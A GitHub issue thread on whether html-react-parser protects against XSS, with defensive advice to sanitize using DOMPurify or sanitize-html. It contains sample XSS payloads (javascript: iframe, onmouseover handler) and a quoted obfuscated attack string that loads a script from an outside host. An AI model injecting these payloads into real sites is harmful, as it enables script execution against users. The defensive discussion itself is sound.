Does html-react-parser strip out XSS?

Question

dave-stevens-net opened this issue 6 years ago

I want to use html-react-parser to sanitize and parse HTML from my CMS. Does it effectively sanitize the input against XSS attacks? https://stackoverflow.com/questions/29044518/safe-alternative-to-dangerouslysetinnerhtml#answer-48261046 claims that it does. If so, I think it would be great to document or advertise this somewhere in the README. Thanks for your work on this.

Mark · Answer 1 · Sat Mar 09 2019 00:19:43 GMT+0800 (China Standard Time)

Great question @dave-stevens-net!

Unfortunately, it doesn't. The reason is that I chose to make this library flexible rather than strict.

Although there is the replace option, checking against all possible attacks may be too much. I recommend instead using an XSS sanitizer with dangerouslySetInnerHTML.

Dave Stevens · Answer 2 · Sat Mar 09 2019 00:23:01 GMT+0800 (China Standard Time)

Good to know. Thanks for the quick response.

Mark · Answer 3 · Sat Mar 09 2019 00:26:58 GMT+0800 (China Standard Time)

You're very welcome. If this answers your question @dave-stevens-net, can the issue be closed?

Mark · Answer 4 · Sun Mar 10 2019 02:23:33 GMT+0800 (China Standard Time)

@dave-stevens-net I may have misspoken earlier about this library not being XSS-safe.

I originally thought this library wasn't XSS-safe because dangerouslySetInnerHTML was relied on here.

However, it seems that I'm unable to reproduce any XSS vulnerabilities. See my fiddle, which is based off of this example.

Let me know if you have any luck in reproducing XSS attacks.

Harvey Forero · Answer 5 · Wed Mar 13 2019 21:35:07 GMT+0800 (China Standard Time)

I managed to reproduce a simple XSS attack. There might be more.

Check my fiddle.

I found it in here https://www.in-secure.org/misc/xss/xss.html

Dave Stevens · Answer 6 · Wed Mar 13 2019 21:43:07 GMT+0800 (China Standard Time)

I ended up coding a Sanitize component using the sanitize-html package dependency.

import React from 'react'
import sanitizeHtml from 'sanitize-html'

const Sanitize = ({ html }) => {
    const clean = sanitizeHtml(html, {
        allowedTags: sanitizeHtml.defaults.allowedTags.concat(['img', 'span']),
        allowedAttributes: {
           ...
        },
    })
    return (
        <span
            className="sanitized-html"
            dangerouslySetInnerHTML={{ __html: clean }}
        />
    )
}
export default Sanitize

Example usage:

<Sanitize html={data.wordpressPage.title} />

Mark · Answer 7 · Thu Mar 14 2019 07:21:19 GMT+0800 (China Standard Time)

@harveydf Great find! Thanks for creating and sharing the fiddle.

I'll update the README.md to note that this library isn't XSS safe.

Christian Nikkanen · Answer 8 · Tue Jul 09 2019 23:02:02 GMT+0800 (China Standard Time)

I didn't want to use sanitize-html, because it's massive. I used dompurify instead; it's 10 times smaller and doesn't remove CSS.

import parse, { domToReact } from 'html-react-parser'
import DOMPurify from 'dompurify'
import React from 'react'

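// Placeholder replace callback; returning undefined leaves the node unchanged.
export function replaceNode() {}

export default function html(html, opts = {}) {
  // Sanitize first, then parse the cleaned markup into React elements.
  return parse(DOMPurify.sanitize(html), {
    replace: replaceNode,
    ...opts,
  })
}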

html('<iframe src=javascript:alert("xss")></iframe>')

Mark · Answer 9 · Sun Jul 14 2019 09:05:33 GMT+0800 (China Standard Time)

Thanks for sharing your approach using dompurify @k1sul1!

I created a Repl.it demo based on your example.

xkcdstickfigure · Answer 10 · Thu Oct 26 2023 01:16:03 GMT+0800 (China Standard Time)

> I managed to reproduce a simple XSS attack. There might be more.
>
> Check my fiddle.
>
> I found it in here https://www.in-secure.org/misc/xss/xss.html

Hey, I know this is a pretty old comment, but I just wanted to point out that this isn't actually an XSS issue, since the JavaScript is running within the iframe. If you change the html to <iframe src=javascript:alert(location.href)></iframe>, you'll see that the URL it's running on is about:blank rather than the host page.

Alex Gleason · Answer 11 · Thu Feb 08 2024 11:26:03 GMT+0800 (China Standard Time)

In the replace function, you can check domNode.name... so wouldn't it be inherently not possible to embed a script tag or iframe there if you just check if (['script', 'iframe'].includes(domNode.name)) return null ?

Mark · Answer 12 · Thu Feb 08 2024 12:37:58 GMT+0800 (China Standard Time)

@alexgleason there are many other ways to do XSS without <script> or <iframe>. For example:

<a onmouseover="alert()">xss</a>

Take a look at https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
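
To make the point above concrete, here is a minimal sketch of why a tag-only check lets attribute-based payloads through. It assumes nodes expose `name` and `attribs` the way the `replace` callback's `domNode` does; plain objects stand in for real nodes, and the helper names `passesTagDenylist` and `eventHandlerAttributes` are hypothetical, not part of html-react-parser.

```javascript
// Assumption: nodes look like { name, attribs }, mirroring the domNode
// passed to `replace`. Plain objects are used so the sketch runs on its own.
const BLOCKED_TAGS = ['script', 'iframe'];

// The tag-only check proposed in the earlier comment.
function passesTagDenylist(node) {
  return !BLOCKED_TAGS.includes(node.name);
}

// Lists inline event-handler attributes (onclick, onmouseover, ...).
function eventHandlerAttributes(node) {
  return Object.keys(node.attribs || {}).filter((attr) =>
    attr.toLowerCase().startsWith('on')
  );
}

const script = { name: 'script', attribs: {} };
const anchor = { name: 'a', attribs: { onmouseover: 'alert()' } };

console.log(passesTagDenylist(script)); // false: caught by the denylist
console.log(passesTagDenylist(anchor)); // true: the denylist lets it through
console.log(eventHandlerAttributes(anchor)); // [ 'onmouseover' ]
```

Even with an attribute check added, this is only an illustration of one gap. It is not a substitute for a maintained sanitizer.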

Alex Gleason · Answer 13 · Thu Feb 08 2024 12:51:57 GMT+0800 (China Standard Time)

Ahh... that makes sense.

What I'm really trying to figure out is if this library is any worse than dangerouslySetInnerHTML. Is there a new attack surface outside of what's already possible with dangerouslySetInnerHTML?

Mark · Answer 14 · Fri Feb 09 2024 00:18:33 GMT+0800 (China Standard Time)

@alexgleason you should treat this library the same as dangerouslySetInnerHTML if you haven't sanitized the HTML string.
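
One way to follow that advice is to make sure the parser is never called on an unsanitized string. The sketch below is an assumption-laden illustration: `createSafeParser` is a hypothetical helper, and `fakeSanitize` and `fakeParse` are stand-ins so the code runs without dependencies. They are not real sanitizers or parsers.

```javascript
// Hypothetical helper: returns a function that always sanitizes before parsing.
function createSafeParser(sanitize, parse) {
  return function safeParse(html, options = {}) {
    return parse(sanitize(html), options);
  };
}

// Stand-ins for illustration only. Do NOT use a regex like this as a sanitizer.
const fakeSanitize = (html) => html.replace(/<script[\s\S]*?<\/script>/gi, '');
const fakeParse = (html) => ({ parsed: html });

const safeParse = createSafeParser(fakeSanitize, fakeParse);

console.log(safeParse('<p>hi</p><script>alert(1)</script>'));
// { parsed: '<p>hi</p>' }
```

In an application, the two arguments would be a real sanitizer and parser, for example `(html) => DOMPurify.sanitize(html)` and `parse` from html-react-parser, as in the dompurify comment earlier in this thread.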

Alex Gleason · Answer 15 · Fri Feb 09 2024 03:59:39 GMT+0800 (China Standard Time)

Thank you for clarifying. A friend of mine got burned by this one earlier this year, so now I am extra paranoid:

@graf does btrfly support pleroma <a href='https://github.com/r/nd&#x61t&#x61:text/html,<scr&#x69pt></scr&#x69pt\" target="_blank" rel="nofollow" src=\"https://i.poastcdn.org/b2977f2d97f598d2ebd6dcf37afd9047b5da2b6dc95a7b2824fb111c906fb117.js\" hidden'></a>

Fortunately I can't reproduce the attack using this library. I just gave it a try.

They were using a custom HTML parser that was vulnerable. This library seems to use the browser's DOMParser when it's available. Therefore, I conclude it's no less secure than using dangerouslySetInnerHTML directly.